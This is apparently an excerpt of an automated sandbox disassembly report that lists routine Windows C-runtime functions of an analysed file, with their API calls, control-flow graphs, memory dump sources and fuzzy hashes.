                                                                              Similarity
                                                                              • API ID: memset$ArgvCommandFreeLineLocal
                                                                              • String ID: /LDAP:
                                                                              • API String ID: 439219084-3282177907
                                                                              • Opcode ID: c97199de566d197a9bdc698e2749c2995025812d22600a2743233cfbdd77b9f7
                                                                              • Instruction ID: b67a9b5ff34df79b1559f425c545014341f608cbd67aca93f9e135d8b4136e64
                                                                              • Opcode Fuzzy Hash: c97199de566d197a9bdc698e2749c2995025812d22600a2743233cfbdd77b9f7
                                                                              • Instruction Fuzzy Hash: 08819075A00A29ABCB34DF24EC98AE9B3B7BF58300F1441A9E51A9B351D734DE858F50
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00623675 Relevance: 7.6, APIs: 5, Instructions: 50timethreadCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 339 623675-623698 340 62369a-62369c 339->340 341 62369e-6236eb GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 339->341 340->341 344 623702-62370c 340->344 342 6236f5-6236fa 341->342 343 6236ed-6236f3 341->343 345 6236fc 342->345 343->342 343->345 345->344
                                                                              APIs
                                                                              • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 006236A2
                                                                              • GetCurrentProcessId.KERNEL32 ref: 006236B1
                                                                              • GetCurrentThreadId.KERNEL32 ref: 006236BA
                                                                              • GetTickCount.KERNEL32 ref: 006236C3
                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 006236D8
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.2095555637.0000000000621000.00000020.00000001.01000000.00000008.sdmp, Offset: 00620000, based on PE: true
                                                                              • Associated: 0000000A.00000002.2095534672.0000000000620000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 0000000A.00000002.2095574084.0000000000625000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 0000000A.00000002.2095574084.0000000000627000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 0000000A.00000002.2095574084.000000000063D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_620000_newfile.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                              • String ID:
                                                                              • API String ID: 1445889803-0
                                                                              • Opcode ID: 6ba3e67178cedfa27f067840d3f7e72e21304edf4c02a5177085384e0b7ed2f5
                                                                              • Instruction ID: 654990140a79d3711450b882b2e849c44cb6ee4da058600292e55bcfd854aeff
                                                                              • Opcode Fuzzy Hash: 6ba3e67178cedfa27f067840d3f7e72e21304edf4c02a5177085384e0b7ed2f5
                                                                              • Instruction Fuzzy Hash: 72110A71D01A18EBCB20DFB8EA48ADEBBF6EF58350F515455D502EB310EB349A418F40
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 006232C0 Relevance: 6.0, APIs: 4, Instructions: 13COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,006233F6,`@b), ref: 006232C7
                                                                              • UnhandledExceptionFilter.KERNEL32(006233F6,?,006233F6,`@b), ref: 006232D0
                                                                              • GetCurrentProcess.KERNEL32(C0000409,?,006233F6,`@b), ref: 006232DB
                                                                              • TerminateProcess.KERNEL32(00000000,?,006233F6,`@b), ref: 006232E2
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.2095555637.0000000000621000.00000020.00000001.01000000.00000008.sdmp, Offset: 00620000, based on PE: true
                                                                              • Associated: 0000000A.00000002.2095534672.0000000000620000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 0000000A.00000002.2095574084.0000000000625000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 0000000A.00000002.2095574084.0000000000627000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 0000000A.00000002.2095574084.000000000063D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_620000_newfile.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                              • String ID:
                                                                              • API String ID: 3231755760-0
                                                                              • Opcode ID: b8a5a67387fa33d1952ebb10b4140b5446a4946d2eee9c3646930c4f0a92a321
                                                                              • Instruction ID: b1add3a6e2bdfac45941d0961f4119a6b13f2abf724c0fa194bcea87ab482907
                                                                              • Opcode Fuzzy Hash: b8a5a67387fa33d1952ebb10b4140b5446a4946d2eee9c3646930c4f0a92a321
                                                                              • Instruction Fuzzy Hash: 69D0E972044D04AFDB302BE1ED0DE593E2AFB44766F459410F70FC6465DA7154528BA6
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00621AE4 Relevance: 2.5, APIs: 2, Instructions: 28memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetProcessHeap.KERNEL32(00000000,?,00000000,00000001,00622589), ref: 00621B09
                                                                              • HeapFree.KERNEL32(00000000), ref: 00621B10
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.2095555637.0000000000621000.00000020.00000001.01000000.00000008.sdmp, Offset: 00620000, based on PE: true
                                                                              • Associated: 0000000A.00000002.2095534672.0000000000620000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 0000000A.00000002.2095574084.0000000000625000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 0000000A.00000002.2095574084.0000000000627000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 0000000A.00000002.2095574084.000000000063D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_620000_newfile.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$FreeProcess
                                                                              • String ID:
                                                                              • API String ID: 3859560861-0
                                                                              • Opcode ID: 5cdc4196204ced70eb789f325c8e75fc968381cc2fa74c962da4b9c4a3b5945d
                                                                              • Instruction ID: 9f63146d926402d14c87ccb5c64ae00e8b636b7f684e19a0a27e8cbef041b6b7
                                                                              • Opcode Fuzzy Hash: 5cdc4196204ced70eb789f325c8e75fc968381cc2fa74c962da4b9c4a3b5945d
                                                                              • Instruction Fuzzy Hash: 90E06D71605B118FCB344FAA9994962BBEAFF25302314482EE99A87610C631D840CF50
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00623450 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_00003400), ref: 00623455
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.2095555637.0000000000621000.00000020.00000001.01000000.00000008.sdmp, Offset: 00620000, based on PE: true
                                                                              • Associated: 0000000A.00000002.2095534672.0000000000620000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 0000000A.00000002.2095574084.0000000000625000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 0000000A.00000002.2095574084.0000000000627000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 0000000A.00000002.2095574084.000000000063D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_620000_newfile.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionFilterUnhandled
                                                                              • String ID:
                                                                              • API String ID: 3192549508-0
                                                                              • Opcode ID: 5b102da509c5afa91ff3520d03d5afa2f9ebed63a0d79c1e785c0a3edf59b0ac
                                                                              • Instruction ID: eb21db9d5e48575844a98c40ebf20887b4d65ee07698a51059d6db1b194f8c2c
                                                                              • Opcode Fuzzy Hash: 5b102da509c5afa91ff3520d03d5afa2f9ebed63a0d79c1e785c0a3edf59b0ac
                                                                              • Instruction Fuzzy Hash: 39900260355D2046472527706C1E91529D26A58B0B7835490A006C5158DB6451025951
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00623530 Relevance: 1.3, Strings: 1, Instructions: 34COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.2095555637.0000000000621000.00000020.00000001.01000000.00000008.sdmp, Offset: 00620000, based on PE: true
                                                                              • Associated: 0000000A.00000002.2095534672.0000000000620000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 0000000A.00000002.2095574084.0000000000625000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 0000000A.00000002.2095574084.0000000000627000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 0000000A.00000002.2095574084.000000000063D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_620000_newfile.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 5b
                                                                              • API String ID: 0-3854325342
                                                                              • Opcode ID: a766d3b511325246591146fa678ec37a36ce2690c67ca02a39aa05bc8c5beb23
                                                                              • Instruction ID: 17186d36360fe01d84c99af4783ccf80ac3cf2f0c35744e0a3a89fcb37f88023
                                                                              • Opcode Fuzzy Hash: a766d3b511325246591146fa678ec37a36ce2690c67ca02a39aa05bc8c5beb23
                                                                              • Instruction Fuzzy Hash: FFF0A7337041315B8B448B4EEC8097EB3DBDEC4B3471980A9E50C9B301DB38ED428A94
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00622A7E Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 90memoryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 313 622a7e-622a8c 314 622a95-622aa1 313->314 315 622a8e-622a90 313->315 317 622aa3 314->317 318 622aaa 314->318 316 622b5b-622b5d 315->316 319 622aa5-622aa8 317->319 320 622aac-622ab3 317->320 318->320 319->318 319->320 321 622ab7-622abb 320->321 322 622ab5 320->322 323 622ac1-622ac3 321->323 324 622b54 321->324 322->321 323->324 326 622ac9-622add GetProcessHeap HeapAlloc 323->326 325 622b59-622b5a 324->325 325->316 326->324 327 622adf-622ae3 326->327 328 622ae5-622afd memcpy 327->328 329 622b1c-622b22 327->329 330 622b0b-622b0f 328->330 331 622aff-622b06 328->331 332 622b24-622b2b 329->332 333 622b2d-622b31 329->333 330->333 335 622b11-622b18 330->335 331->331 334 622b08 331->334 332->332 332->333 336 622b33-622b3e GetProcessHeap HeapFree 333->336 337 622b44-622b52 333->337 334->330 335->335 338 622b1a 335->338 336->337 337->325 338->333
                                                                              APIs
                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,00000000,m(b,?,00622BA4,?,?,8000FFFF,00000000,?,?,?,0062286D,?), ref: 00622ACC
                                                                              • HeapAlloc.KERNEL32(00000000,?,00622BA4,?,?,8000FFFF,00000000,?,?,?,0062286D,?,?), ref: 00622AD3
                                                                              • memcpy.MSVCRT ref: 00622AEB
                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,00622BA4,?,?,8000FFFF,00000000,?,?,?,0062286D,?,?), ref: 00622B37
                                                                              • HeapFree.KERNEL32(00000000,?,00622BA4,?,?,8000FFFF,00000000,?,?,?,0062286D,?,?), ref: 00622B3E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.2095555637.0000000000621000.00000020.00000001.01000000.00000008.sdmp, Offset: 00620000, based on PE: true
                                                                              • Associated: 0000000A.00000002.2095534672.0000000000620000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 0000000A.00000002.2095574084.0000000000625000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 0000000A.00000002.2095574084.0000000000627000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 0000000A.00000002.2095574084.000000000063D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_620000_newfile.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$Process$AllocFreememcpy
                                                                              • String ID: m(b
                                                                              • API String ID: 3405790324-1102000063
                                                                              • Opcode ID: 7f033d902de37488d3c80d46066d09239e6645214c60bd8632af87a50dd3460d
                                                                              • Instruction ID: 94398edb5b713e5ac94aa8ff075aa2ddd3e31c12d333258ef842cfb88fce3bc8
                                                                              • Opcode Fuzzy Hash: 7f033d902de37488d3c80d46066d09239e6645214c60bd8632af87a50dd3460d
                                                                              • Instruction Fuzzy Hash: 1F21E471A00E23BBDB355E2CE9A4B95BBA7BB04319F104225E9158B790DB74DC51CF90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00622F80 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                                • Part of subcall function 006234D8: GetModuleHandleW.KERNEL32(00000000), ref: 006234DF
                                                                              • __set_app_type.MSVCRT ref: 00622F92
                                                                              • __p__fmode.MSVCRT ref: 00622FA8
                                                                              • __p__commode.MSVCRT ref: 00622FB6
                                                                              • __setusermatherr.MSVCRT ref: 00622FD7
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.2095555637.0000000000621000.00000020.00000001.01000000.00000008.sdmp, Offset: 00620000, based on PE: true
                                                                              • Associated: 0000000A.00000002.2095534672.0000000000620000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 0000000A.00000002.2095574084.0000000000625000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 0000000A.00000002.2095574084.0000000000627000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 0000000A.00000002.2095574084.000000000063D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_620000_newfile.jbxd
                                                                              Similarity
                                                                              • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                              • String ID:
                                                                              • API String ID: 1632413811-0
                                                                              • Opcode ID: 1322e37e0e94b6a165ea9656a0f2ea9b242e19bdfc2b507f896561870281457e
                                                                              • Instruction ID: 5daaf666d6420f74d5c3e04cf4948434641eee7e31e542185cba1def3b58e5e8
                                                                              • Opcode Fuzzy Hash: 1322e37e0e94b6a165ea9656a0f2ea9b242e19bdfc2b507f896561870281457e
                                                                              • Instruction Fuzzy Hash: 41F01CB0544F20CFC738AB30BD0E6143BA3BB04321B11660AE962963F1DF398142CE14
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%